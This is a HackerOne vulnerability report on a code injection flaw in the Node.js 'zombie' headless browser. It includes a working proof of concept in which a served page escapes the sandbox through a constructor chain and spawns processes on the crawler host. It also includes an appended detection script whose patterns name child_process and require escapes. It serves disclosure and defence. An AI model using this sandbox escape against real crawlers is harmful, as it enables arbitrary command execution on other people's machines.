HackerOne report H1:389583 (cris_semmle)
History: Aug 02, 2018 - 10:47 a.m.

Node.js third-party modules: Code Injection Vulnerability in zombie Package

cris_semmle
hackerone.com

I would like to report a code injection vulnerability in zombie.
It allows crawled websites to access privileged APIs such as the file system or child process.

Module

module name: zombie
version: 6.1.2
npm page: https://www.npmjs.com/package/zombie

Module Description

Insanely fast, headless full-stack testing using Node.js

Module Stats

12,671 downloads in the last week

Vulnerability

Vulnerability Description

Attackers can insert JS code in their pages that exploits the zombiejs code injection vulnerability. If such pages are crawled using zombiejs, the machine running the crawler will run arbitrary commands supplied by the attacker. For comparison, jsdom disables script execution by default.

Steps To Reproduce:

// begin exploit: the page script reaches the Function constructor through
// this[c][c], escapes the page sandbox to obtain Node's require(), and then
// spawns a process on the crawler host
var codeToExec = "var sync=require('child_process').spawnSync; " +
    "var ls = sync('cat', ['./resources/test.html']); console.log(ls.output.toString());";
var exploit = "c='constructor';require=this[c][c]('return process')().mainModule.require;" + codeToExec;
var attackVector = "c='constructor';this[c][c](\"" + exploit + "\")()";
// end exploit

var express = require('express');

var app = express();

app.get('/test', function(req, res) {
    res.send("<script>" + attackVector + "</script>");
});

app.listen(3000);


const Browser = require('zombie');

// We're going to make requests to http://example.com/signup
// Which will be routed to our test server localhost:3000
Browser.localhost('example.com', 3000);


const browser = new Browser();
// Visiting the page runs its inline script with the crawler's Node privileges
browser.visit('/test', function(err, res) {
});

Patch

N/A. Make users aware of this issue and offer a way to disable script execution on untrusted crawled pages.
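As an added defender-side example (not part of the report or of the zombie project), the following is a heuristic triage check that scans the inline scripts of a fetched page for the sandbox-escape indicators used in the PoC above, so that such pages can be logged or quarantined before a script-enabled crawler visits them; the indicator list and both sample pages are constructed for this example.

```javascript
'use strict';

// Collect the bodies of inline <script> elements from an HTML document.
function extractInlineScripts(html) {
  const scripts = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) scripts.push(m[1]);
  return scripts;
}

// Indicators taken from the report's proof of concept. A page script has no
// legitimate reason to reach the Function constructor through a double
// "constructor" lookup, or to name Node-only objects such as require/process.
const INDICATORS = [
  { name: 'constructor-chain',          // 'constructor' key plus an x[c][c]-style double index
    test: s => /['"]constructor['"]/.test(s) && /\[\s*(\w+)\s*\]\s*\[\s*\1\s*\]/.test(s) },
  { name: 'constructor-chain-literal',  // the same chain written out literally
    test: s => /\.constructor\s*\.\s*constructor|\[\s*['"]constructor['"]\s*\]\s*\[\s*['"]constructor['"]\s*\]/.test(s) },
  { name: 'return-process', test: s => /\breturn\s+process\b/.test(s) },
  { name: 'node-require',   test: s => /\brequire\s*\(|\bmainModule\b/.test(s) },
  { name: 'child-process',  test: s => /\bchild_process\b/.test(s) },
];

// Returns one finding per inline script that matches at least one indicator.
function scanHtml(html) {
  const findings = [];
  extractInlineScripts(html).forEach((body, index) => {
    const indicators = INDICATORS.filter(i => i.test(body)).map(i => i.name);
    if (indicators.length > 0) findings.push({ script: index, indicators });
  });
  return findings;
}

// Constructed samples: the report's attack vector, and a benign inline script.
const MALICIOUS_PAGE = '<html><body><script>' +
  "c='constructor';this[c][c](\"c='constructor';require=this[c][c]('return process')()" +
  ".mainModule.require;var sync=require('child_process').spawnSync;\")()" +
  '</script></body></html>';
const BENIGN_PAGE = '<html><body><script>var c = 1; document.title = "hello " + c;</script></body></html>';

console.log(JSON.stringify(scanHtml(MALICIOUS_PAGE)));  // flags script 0 with four indicators
console.log(JSON.stringify(scanHtml(BENIGN_PAGE)));     // []
```

This is pattern matching on source text and is easily evaded, so it complements rather than replaces disabling script execution for untrusted pages (in zombie, the runScripts browser option).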

Supporting Material/References:

Wrap up

  • I contacted the maintainer to let them know: N
  • I opened an issue in the related repository: N

Impact

Analysed web pages can execute privileged commands on the machine running zombiejs. This is especially important if zombiejs is used to build a crawler.